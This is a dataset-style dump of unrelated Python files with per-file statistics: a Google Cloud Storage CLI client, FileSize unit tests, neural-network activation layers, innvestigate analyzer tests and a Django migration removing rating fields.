super(ObjectsTestIamPermissions, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object, permissions):
"""Tests a set of permissions on the given object to see which, if any,
are held by the caller.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
permissions: Permissions to test.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsTestIamPermissionsRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
permissions=permissions.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objects.TestIamPermissions(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsUpdate(apitools_base_cli.NewCmd):
"""Command wrapping objects.Update."""
usage = """objects_update <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsUpdate, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'objectResource',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to this object.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to full.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Updates an object's metadata.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's current generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
objectResource: A Object resource to be passed as the request body.
predefinedAcl: Apply a predefined set of access controls to this object.
projection: Set of properties to return. Defaults to full.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsUpdateRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['objectResource'].present:
request.objectResource = apitools_base.JsonToMessage(messages.Object, FLAGS.objectResource)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageObjectsUpdateRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsUpdateRequest.ProjectionValueValuesEnum(FLAGS.projection)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Update(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsWatchAll(apitools_base_cli.NewCmd):
"""Command wrapping objects.WatchAll."""
usage = """objects_watchAll <bucket>"""
def __init__(self, name, fv):
super(ObjectsWatchAll, self).__init__(name, fv)
flags.DEFINE_string(
'channel',
None,
u'A Channel resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_string(
'delimiter',
None,
u'Returns results in a directory-like mode. items will contain only '
u'objects whose names, aside from the prefix, do not contain '
u'delimiter. Objects whose names, aside from the prefix, contain '
u'delimiter will have their name, truncated after the delimiter, '
u'returned in prefixes. Duplicate prefixes are omitted.',
flag_values=fv)
flags.DEFINE_integer(
'maxResults',
None,
u'Maximum number of items plus prefixes to return. As duplicate '
u'prefixes are omitted, fewer total results may be returned than '
u'requested. The default value of this parameter is 1,000 items.',
flag_values=fv)
flags.DEFINE_string(
'pageToken',
None,
u'A previously-returned page token representing part of the larger '
u'set of results to view.',
flag_values=fv)
flags.DEFINE_string(
'prefix',
None,
u'Filter results to objects whose names begin with this prefix.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
flags.DEFINE_boolean(
'versions',
None,
u'If true, lists all versions of an object as distinct results. The '
u'default is false. For more information, see Object Versioning.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Watch for changes on all objects in a bucket.
Args:
bucket: Name of the bucket in which to look for objects.
Flags:
channel: A Channel resource to be passed as the request body.
delimiter: Returns results in a directory-like mode. items will contain
only objects whose names, aside from the prefix, do not contain
delimiter. Objects whose names, aside from the prefix, contain
delimiter will have their name, truncated after the delimiter,
returned in prefixes. Duplicate prefixes are omitted.
maxResults: Maximum number of items plus prefixes to return. As
duplicate prefixes are omitted, fewer total results may be returned
than requested. The default value of this parameter is 1,000 items.
pageToken: A previously-returned page token representing part of the
larger set of results to view.
prefix: Filter results to objects whose names begin with this prefix.
projection: Set of properties to return. Defaults to noAcl.
versions: If true, lists all versions of an object as distinct results.
The default is false. For more information, see Object Versioning.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsWatchAllRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['channel'].present:
request.channel = apitools_base.JsonToMessage(messages.Channel, FLAGS.channel)
if FLAGS['delimiter'].present:
request.delimiter = FLAGS.delimiter.decode('utf8')
if FLAGS['maxResults'].present:
request.maxResults = FLAGS.maxResults
if FLAGS['pageToken'].present:
request.pageToken = FLAGS.pageToken.decode('utf8')
if FLAGS['prefix'].present:
request.prefix = FLAGS.prefix.decode('utf8')
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsWatchAllRequest.ProjectionValueValuesEnum(FLAGS.projection)
if FLAGS['versions'].present:
request.versions = FLAGS.versions
result = client.objects.WatchAll(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
def main(_):
appcommands.AddCmd('pyshell', PyShell)
appcommands.AddCmd('bucketAccessControls_delete', BucketAccessControlsDelete)
appcommands.AddCmd('bucketAccessControls_get', BucketAccessControlsGet)
appcommands.AddCmd('bucketAccessControls_insert', BucketAccessControlsInsert)
appcommands.AddCmd('bucketAccessControls_list', BucketAccessControlsList)
appcommands.AddCmd('bucketAccessControls_patch', BucketAccessControlsPatch)
appcommands.AddCmd('bucketAccessControls_update', BucketAccessControlsUpdate)
appcommands.AddCmd('buckets_delete', BucketsDelete)
appcommands.AddCmd('buckets_get', BucketsGet)
appcommands.AddCmd('buckets_getIamPolicy', BucketsGetIamPolicy)
appcommands.AddCmd('buckets_insert', BucketsInsert)
appcommands.AddCmd('buckets_list', BucketsList)
appcommands.AddCmd('buckets_patch', BucketsPatch)
appcommands.AddCmd('buckets_setIamPolicy', BucketsSetIamPolicy)
appcommands.AddCmd('buckets_testIamPermissions', BucketsTestIamPermissions)
appcommands.AddCmd('buckets_update', BucketsUpdate)
appcommands.AddCmd('channels_stop', ChannelsStop)
appcommands.AddCmd('defaultObjectAccessControls_delete', DefaultObjectAccessControlsDelete)
appcommands.AddCmd('defaultObjectAccessControls_get', DefaultObjectAccessControlsGet)
appcommands.AddCmd('defaultObjectAccessControls_insert', DefaultObjectAccessControlsInsert)
appcommands.AddCmd('defaultObjectAccessControls_list', DefaultObjectAccessControlsList)
appcommands.AddCmd('defaultObjectAccessControls_patch', DefaultObjectAccessControlsPatch)
appcommands.AddCmd('defaultObjectAccessControls_update', DefaultObjectAccessControlsUpdate)
appcommands.AddCmd('notifications_delete', NotificationsDelete)
appcommands.AddCmd('notifications_get', NotificationsGet)
appcommands.AddCmd('notifications_insert', NotificationsInsert)
appcommands.AddCmd('notifications_list', NotificationsList)
appcommands.AddCmd('objectAccessControls_delete', ObjectAccessControlsDelete)
appcommands.AddCmd('objectAccessControls_get', ObjectAccessControlsGet)
appcommands.AddCmd('objectAccessControls_insert', ObjectAccessControlsInsert)
appcommands.AddCmd('objectAccessControls_list', ObjectAccessControlsList)
appcommands.AddCmd('objectAccessControls_patch', ObjectAccessControlsPatch)
appcommands.AddCmd('objectAccessControls_update', ObjectAccessControlsUpdate)
appcommands.AddCmd('objects_compose', ObjectsCompose)
appcommands.AddCmd('objects_copy', ObjectsCopy)
appcommands.AddCmd('objects_delete', ObjectsDelete)
appcommands.AddCmd('objects_get', ObjectsGet)
appcommands.AddCmd('objects_getIamPolicy', ObjectsGetIamPolicy)
appcommands.AddCmd('objects_insert', ObjectsInsert)
appcommands.AddCmd('objects_list', ObjectsList)
appcommands.AddCmd('objects_patch', ObjectsPatch)
appcommands.AddCmd('objects_rewrite', ObjectsRewrite)
appcommands.AddCmd('objects_setIamPolicy', ObjectsSetIamPolicy)
appcommands.AddCmd('objects_testIamPermissions', ObjectsTestIamPermissions)
appcommands.AddCmd('objects_update', ObjectsUpdate)
appcommands.AddCmd('objects_watchAll', ObjectsWatchAll)
apitools_base_cli.SetupLogger()
if hasattr(appcommands, 'SetDefaultCommand'):
appcommands.SetDefaultCommand('pyshell')
run_main = apitools_base_cli.run_main
if __name__ == '__main__':
appcommands.Run()
| 40.032132
| 155
| 0.692619
| 16,220
| 143,275
| 6.030148
| 0.042047
| 0.025529
| 0.028576
| 0.031285
| 0.852825
| 0.845617
| 0.828697
| 0.785899
| 0.7709
| 0.752845
| 0
| 0.002146
| 0.222767
| 143,275
| 3,578
| 156
| 40.04332
| 0.876183
| 0.000607
| 0
| 0.753309
| 1
| 0
| 0.290392
| 0.038627
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.006017
| 0.004813
| null | null | 0.018452
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
cc0fe701e6783f9ade885ccfa0991a893ed95182
| 3,447
|
py
|
Python
|
TestFileSize_set_get.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
TestFileSize_set_get.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | 6
|
2017-02-09T00:54:50.000Z
|
2017-02-09T10:56:13.000Z
|
TestFileSize_set_get.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
import unittest
import FileSize
from decimal import Decimal
class TestFileSize_set_get(unittest.TestCase):
def test_set_unit_999(self):
with self.assertRaises(Exception) as e:
unit=999;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual('単位あたりのByte数は1000または1024のみ有効です。無効値: {0}'.format(unit), e.exception.args[0])
def test_set_unit_1001(self):
with self.assertRaises(Exception) as e:
unit=1001;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual('単位あたりのByte数は1000または1024のみ有効です。無効値: {0}'.format(unit), e.exception.args[0])
def test_set_unit_1023(self):
with self.assertRaises(Exception) as e:
unit=1023;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual('単位あたりのByte数は1000または1024のみ有効です。無効値: {0}'.format(unit), e.exception.args[0])
def test_set_unit_1025(self):
with self.assertRaises(Exception) as e:
unit=1025;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual('単位あたりのByte数は1000または1024のみ有効です。無効値: {0}'.format(unit), e.exception.args[0])
def test_get_unit_name_B(self):
unit=1000;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitName(), "B")
def test_get_unit_name_iB(self):
unit=1024;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitName(), "iB")
def test_get_unit_full_name_Byte(self):
unit=1000;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitFullName(), "Byte")
def test_get_unit_full_name_iByte(self):
unit=1024;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitFullName(), "iByte")
def test_get_standard_name_english_1000(self):
unit=1000;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitStandardName_English(), "SI")
def test_get_standard_name_english_1024(self):
unit=1024;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitStandardName_English(), "BinaryPrefix")
def test_get_standard_name_japanese_1000(self):
unit=1000;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitStandardName_Japanese(), "国際単位系")
def test_get_standard_name_japanese_1024(self):
unit=1024;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitStandardName_Japanese(), "2進接頭辞")
def test_get_unit_description_1000(self):
unit=1000;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitDescription(), "https://ja.wikipedia.org/wiki/%E5%9B%BD%E9%9A%9B%E5%8D%98%E4%BD%8D%E7%B3%BB")
def test_get_unit_description_1024(self):
unit=1024;
self.__target = FileSize.FileSize(byte_size_of_unit=unit)
self.assertEqual(self.__target.GetByteOfUnitDescription(), "https://ja.wikipedia.org/wiki/2%E9%80%B2%E6%8E%A5%E9%A0%AD%E8%BE%9E")
| 48.549296
| 145
| 0.709022
| 436
| 3,447
| 5.252294
| 0.181193
| 0.104803
| 0.110044
| 0.158952
| 0.89607
| 0.861572
| 0.79083
| 0.79083
| 0.720961
| 0.720961
| 0
| 0.056597
| 0.179867
| 3,447
| 70
| 146
| 49.242857
| 0.753449
| 0
| 0
| 0.5
| 0
| 0.03125
| 0.095763
| 0.039466
| 0
| 0
| 0
| 0
| 0.28125
| 1
| 0.21875
| false
| 0
| 0.046875
| 0
| 0.28125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc182e70e9b8ed39660535959cc9f523b237486a
| 2,987
|
py
|
Python
|
project2/activation.py
|
Shanci-Li/DL_project
|
b13a6f687c5aa2be8e197246315817c76de6e33a
|
[
"MIT"
] | null | null | null |
project2/activation.py
|
Shanci-Li/DL_project
|
b13a6f687c5aa2be8e197246315817c76de6e33a
|
[
"MIT"
] | null | null | null |
project2/activation.py
|
Shanci-Li/DL_project
|
b13a6f687c5aa2be8e197246315817c76de6e33a
|
[
"MIT"
] | null | null | null |
from helpers import Module
import torch
# implements of activation layer: Relu and Tanh
class Relu(Module):
"""
Relu activation layer
Method: forward()
backward()
"""
def __init__(self):
super().__init__()
self.s = 0
self.x = 0
def forward(self, inputs):
# x = sigma(s)
self.s = inputs
self.x = self.s.clamp(min=0)
return self.x
def backward(self, grad_wrt_output):
# l'(s) = l'(x) * d_sigma(s) point-wise product
# grad_wrt_output is l'(x), which is dl/dx
d_sigma_s = self.s.sign().clamp(min=0)
return grad_wrt_output * d_sigma_s
def param(self):
""""
Return a list of pairs, each composed of a parameter tensor, and a gradient tensor of same size.
This list should be empty for parameterless modules (e.g. ReLU).
"""
return [(None, None)]
def moment(self):
# parameters of the layer when update weights using momentum method
return [(None, None, None)]
def adam(self):
# parameters of the layer when update weights using adam method
return [(None, None, None, None, None)]
class Tanh(Module):
"""
Tanh activation layer
Method: forward()
backward()
"""
def __init__(self):
super().__init__()
self.s = 0
self.x = 0
def forward(self, inputs):
# x = sigma(s)
self.s = inputs
self.x = self.s.tanh()
return self.x
def backward(self, grad_wrt_output):
# l'(s) = l'(x) * d_sigma(s) point-wise product
# grad_wrt_output is l'(x), which is dl/dx
# d_sigma(s) = (tanh_s)' = 1 - (tanh_s)^2
d_sigma_s = 1 - self.s.tanh() ** 2
return grad_wrt_output * d_sigma_s
def param(self):
return [(None, None)]
def moment(self):
return [(None, None, None)]
def adam(self):
# parameters of the layer when update weights using adam method
return [(None, None, None, None, None)]
class Sigmoid(Module):
"""
Sigmoid activation layer
Method: forward()
backward()
"""
def __init__(self):
super().__init__()
self.s = 0
self.x = 0
def forward(self, inputs):
# x = sigma(s)
self.s = inputs
self.x = torch.sigmoid(self.s)
return self.x
def backward(self, grad_wrt_output):
# l'(s) = l'(x) * d_sigma(s) point-wise product
# grad_wrt_output is l'(x), which is dl/dx
# d_sigma(s) = sigmoid(s) * (1 - sigmoid(s))
d_sigma_s = self.x * (1 - self.x)
return grad_wrt_output * d_sigma_s
def param(self):
return [(None, None)]
def moment(self):
return [(None, None, None)]
def adam(self):
# parameters of the layer when update weights using adam method
return [(None, None, None, None, None)]
| 25.529915
| 104
| 0.553398
| 406
| 2,987
| 3.921182
| 0.182266
| 0.105528
| 0.090452
| 0.067839
| 0.770101
| 0.766332
| 0.751884
| 0.751884
| 0.751884
| 0.72299
| 0
| 0.006983
| 0.328758
| 2,987
| 116
| 105
| 25.75
| 0.787032
| 0.344158
| 0
| 0.803571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.321429
| false
| 0
| 0.035714
| 0.142857
| 0.678571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
f0b0b5360397f703bb5e02d91c70f7a8cd50eec9
| 280
|
py
|
Python
|
temboo/core/Library/Google/ComputeEngine/Zones/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Google/ComputeEngine/Zones/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Google/ComputeEngine/Zones/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Google.ComputeEngine.Zones.GetZone import GetZone, GetZoneInputSet, GetZoneResultSet, GetZoneChoreographyExecution
from temboo.Library.Google.ComputeEngine.Zones.ListZones import ListZones, ListZonesInputSet, ListZonesResultSet, ListZonesChoreographyExecution
| 93.333333
| 144
| 0.892857
| 24
| 280
| 10.416667
| 0.625
| 0.08
| 0.136
| 0.184
| 0.328
| 0.328
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 280
| 2
| 145
| 140
| 0.93985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f0b44604dbcd733a792038e5616faa760ab83f73
| 5,403
|
py
|
Python
|
innvestigate/tests/analyzer/test_gradient_based.py
|
rtygbwwwerr/innvestigate
|
de6d9a191d969a542ab1f7ab3fb615ede10c7362
|
[
"MIT"
] | 2
|
2019-12-19T08:07:28.000Z
|
2020-03-12T02:57:55.000Z
|
innvestigate/tests/analyzer/test_gradient_based.py
|
rtygbwwwerr/innvestigate
|
de6d9a191d969a542ab1f7ab3fb615ede10c7362
|
[
"MIT"
] | null | null | null |
innvestigate/tests/analyzer/test_gradient_based.py
|
rtygbwwwerr/innvestigate
|
de6d9a191d969a542ab1f7ab3fb615ede10c7362
|
[
"MIT"
] | 1
|
2020-11-06T01:52:28.000Z
|
2020-11-06T01:52:28.000Z
|
# Begin: Python 2/3 compatibility header small
# Get Python 3 functionality:
from __future__ import\
absolute_import, print_function, division, unicode_literals
from future.utils import raise_with_traceback, raise_from
# catch exception with: except Exception as e
from builtins import range, map, zip, filter
from io import open
import six
# End: Python 2/3 compatability header small
###############################################################################
###############################################################################
###############################################################################
import pytest
from innvestigate.utils.tests import dryrun
from innvestigate.analyzer import BaselineGradient
from innvestigate.analyzer import Gradient
from innvestigate.analyzer import Deconvnet
from innvestigate.analyzer import GuidedBackprop
from innvestigate.analyzer import IntegratedGradients
from innvestigate.analyzer import SmoothGrad
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__BaselineGradient():
def method(model):
return BaselineGradient(model)
dryrun.test_analyzer(method, "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__BaselineGradient():
def method(model):
return BaselineGradient(model)
dryrun.test_analyzer(method, "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__BaselineGradient():
def method(model):
return BaselineGradient(model)
dryrun.test_analyzer(method, "imagenet.*")
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__Gradient():
def method(model):
return Gradient(model)
dryrun.test_analyzer(method, "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__Gradient():
def method(model):
return Gradient(model)
dryrun.test_analyzer(method, "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__Gradient():
def method(model):
return Gradient(model)
dryrun.test_analyzer(method, "imagenet.*")
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__Deconvnet():
def method(model):
return Deconvnet(model)
dryrun.test_analyzer(method, "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__Deconvnet():
def method(model):
return Deconvnet(model)
dryrun.test_analyzer(method, "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__Deconvnet():
def method(model):
return Deconvnet(model)
dryrun.test_analyzer(method, "imagenet.*")
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__GuidedBackprop():
def method(model):
return GuidedBackprop(model)
dryrun.test_analyzer(method, "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__GuidedBackprop():
def method(model):
return GuidedBackprop(model)
dryrun.test_analyzer(method, "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__GuidedBackprop():
def method(model):
return GuidedBackprop(model)
dryrun.test_analyzer(method, "imagenet.*")
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__IntegratedGradients():
def method(model):
return IntegratedGradients(model)
dryrun.test_analyzer(method, "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__IntegratedGradients():
def method(model):
return IntegratedGradients(model)
dryrun.test_analyzer(method, "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__IntegratedGradients():
def method(model):
return IntegratedGradients(model, steps=2)
dryrun.test_analyzer(method, "imagenet.*")
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__SmoothGrad():
def method(model):
return SmoothGrad(model)
dryrun.test_analyzer(method, "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__SmoothGrad():
def method(model):
return SmoothGrad(model)
dryrun.test_analyzer(method, "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__SmoothGrad():
def method(model):
return SmoothGrad(model, augment_by_n=2)
dryrun.test_analyzer(method, "imagenet.*")
| 23.288793
| 79
| 0.577087
| 497
| 5,403
| 6.092555
| 0.134809
| 0.11889
| 0.083223
| 0.11889
| 0.793263
| 0.793263
| 0.782034
| 0.746367
| 0.746367
| 0.731836
| 0
| 0.001476
| 0.122339
| 5,403
| 231
| 80
| 23.38961
| 0.637073
| 0.029428
| 0
| 0.721311
| 0
| 0
| 0.057721
| 0.03256
| 0
| 0
| 0
| 0
| 0
| 1
| 0.295082
| false
| 0
| 0.114754
| 0.147541
| 0.557377
| 0.008197
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
f0e31e74359c3ea5619dccb81c099707f2ed1a87
| 3,379
|
py
|
Python
|
ktapp/migrations/0045_auto_20151112_0140.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 5
|
2015-04-13T09:44:31.000Z
|
2017-10-19T01:07:58.000Z
|
ktapp/migrations/0045_auto_20151112_0140.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 49
|
2015-02-15T07:12:05.000Z
|
2022-03-11T23:11:43.000Z
|
ktapp/migrations/0045_auto_20151112_0140.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ktapp', '0044_useruserrating_similarity'),
]
operations = [
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_11',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_12',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_13',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_14',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_15',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_21',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_22',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_23',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_24',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_25',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_31',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_32',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_33',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_34',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_35',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_41',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_42',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_43',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_44',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_45',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_51',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_52',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_53',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_54',
),
migrations.RemoveField(
model_name='useruserrating',
name='number_of_ratings_55',
),
]
| 29.382609
| 52
| 0.560817
| 274
| 3,379
| 6.525547
| 0.186131
| 0.293624
| 0.363535
| 0.419463
| 0.880872
| 0.880872
| 0.880872
| 0.880872
| 0.880872
| 0
| 0
| 0.02473
| 0.341817
| 3,379
| 114
| 53
| 29.640351
| 0.779227
| 0.006215
| 0
| 0.694444
| 0
| 0
| 0.263707
| 0.008939
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018519
